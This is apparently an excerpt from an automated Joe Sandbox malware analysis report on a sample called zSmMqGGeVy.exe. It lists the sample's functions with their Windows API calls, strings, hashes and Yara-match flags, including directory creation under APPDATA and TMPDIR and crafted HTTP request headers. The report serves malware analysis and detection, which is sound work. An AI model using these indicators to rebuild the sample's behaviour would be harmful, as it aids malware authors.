                                                  • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00E9B43F
                                                  • type_info::operator==.LIBVCRUNTIME ref: 00E9B461
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00E9B570
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00E9B642
                                                  • _UnwindNestedFrames.LIBCMT ref: 00E9B6C6
                                                  • CallUnexpected.LIBVCRUNTIME ref: 00E9B6E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction ID: 8a8373d6bb8fefc6551eac08ae79e04a0a590870574b9560f1a7cb03e985bdcd
                                                  • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction Fuzzy Hash: E0B18C71900209EFCF24DFA4EA819AEBBB5FF14318F15616AE8157B212D730EA51CF91
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$___from_strstr_to_strchr
                                                  • String ID: `0
                                                  • API String ID: 3409252457-3674772010
                                                  • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                  • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                  • String ID: APPDATA$TMPDIR
                                                  • API String ID: 1838500112-4048745339
                                                  • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                  • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                  Strings
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$H_prolog3_
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  • API String ID: 1254599795-787135837
                                                  • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                  • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                  APIs
                                                  • _free.LIBCMT ref: 004110FB
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 00411107
                                                  • _free.LIBCMT ref: 00411112
                                                  • _free.LIBCMT ref: 0041111D
                                                  • _free.LIBCMT ref: 00411128
                                                  • _free.LIBCMT ref: 00411133
                                                  • _free.LIBCMT ref: 0041113E
                                                  • _free.LIBCMT ref: 00411149
                                                  • _free.LIBCMT ref: 00411154
                                                  • _free.LIBCMT ref: 00411162
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                  • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                                  • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                  • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                                  APIs
                                                  • _free.LIBCMT ref: 00EA1362
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA136E
                                                  • _free.LIBCMT ref: 00EA1379
                                                  • _free.LIBCMT ref: 00EA1384
                                                  • _free.LIBCMT ref: 00EA138F
                                                  • _free.LIBCMT ref: 00EA139A
                                                  • _free.LIBCMT ref: 00EA13A5
                                                  • _free.LIBCMT ref: 00EA13B0
                                                  • _free.LIBCMT ref: 00EA13BB
                                                  • _free.LIBCMT ref: 00EA13C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                  • Instruction ID: f73c7fb6e8461d95ef5ca4cfe1ba0f233df5f9795f238dae84056b9b394cc098
                                                  • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                  • Instruction Fuzzy Hash: 0321747A90011CEFCB45EFA5D881DDE7BB9AF09341F0161A6B615AF121DB31EA448B81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                  • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                  APIs
                                                  • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                  • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                                  • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                  • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                                  APIs
                                                  • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                  • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                  • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2751267872-393685449
                                                  • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                  • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00E992CD), ref: 00E992FB
                                                  • GetModuleHandleW.KERNEL32(0041DFB8,?,?,00E992CD), ref: 00E99306
                                                  • GetModuleHandleW.KERNEL32(0041DFFC,?,?,00E992CD), ref: 00E99317
                                                  • GetProcAddress.KERNEL32(00000000,0041E018), ref: 00E99329
                                                  • GetProcAddress.KERNEL32(00000000,0041E034), ref: 00E99337
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E992CD), ref: 00E9935A
                                                  • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 00E99376
                                                  • CloseHandle.KERNEL32(0042AF60,?,?,00E992CD), ref: 00E99386
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID:
                                                  • API String ID: 2565136772-0
                                                  • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction ID: 155c40a68eaca0fcb6ec87516587afd9e2560c04e6f8d301c58fd0e04329e75f
                                                  • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction Fuzzy Hash: EA01DDF1F403216FDB305F75BD09B9E3BA8AB4CB05B154035FD05E2191D7ACC801866A
                                                  APIs
                                                  • __RTC_Initialize.LIBCMT ref: 1000291D
                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                  • String ID:
                                                  • API String ID: 2442719207-0
                                                  • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                  • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                                  • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                  • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe$obA
                                                  • API String ID: 0-1494245280
                                                  • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                  • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                                  • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                  • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                                  • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                  • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                  APIs
                                                    • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                                  • _free.LIBCMT ref: 004170D0
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 004170DB
                                                  • _free.LIBCMT ref: 004170E6
                                                  • _free.LIBCMT ref: 0041713A
                                                  • _free.LIBCMT ref: 00417145
                                                  • _free.LIBCMT ref: 00417150
                                                  • _free.LIBCMT ref: 0041715B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                  • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                                  • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                  • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                                  APIs
                                                    • Part of subcall function 00EA72B1: _free.LIBCMT ref: 00EA72D6
                                                  • _free.LIBCMT ref: 00EA7337
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA7342
                                                  • _free.LIBCMT ref: 00EA734D
                                                  • _free.LIBCMT ref: 00EA73A1
                                                  • _free.LIBCMT ref: 00EA73AC
                                                  • _free.LIBCMT ref: 00EA73B7
                                                  • _free.LIBCMT ref: 00EA73C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                  • Instruction ID: 8710b0400b4eb085f4f78d05bc91e3f1d5c21578244cf19e7bd17a30d08eea40
                                                  • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                  • Instruction Fuzzy Hash: FF114FB5544B18AAD920F7B0CC47FCB7BDDAF4E700F401825F2E97E062DA65B5144671
                                                  APIs
                                                    • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                  • _free.LIBCMT ref: 1000C60D
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C618
                                                  • _free.LIBCMT ref: 1000C623
                                                  • _free.LIBCMT ref: 1000C677
                                                  • _free.LIBCMT ref: 1000C682
                                                  • _free.LIBCMT ref: 1000C68D
                                                  • _free.LIBCMT ref: 1000C698
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                  • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                                  • __fassign.LIBCMT ref: 00417EFA
                                                  • __fassign.LIBCMT ref: 00417F17
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
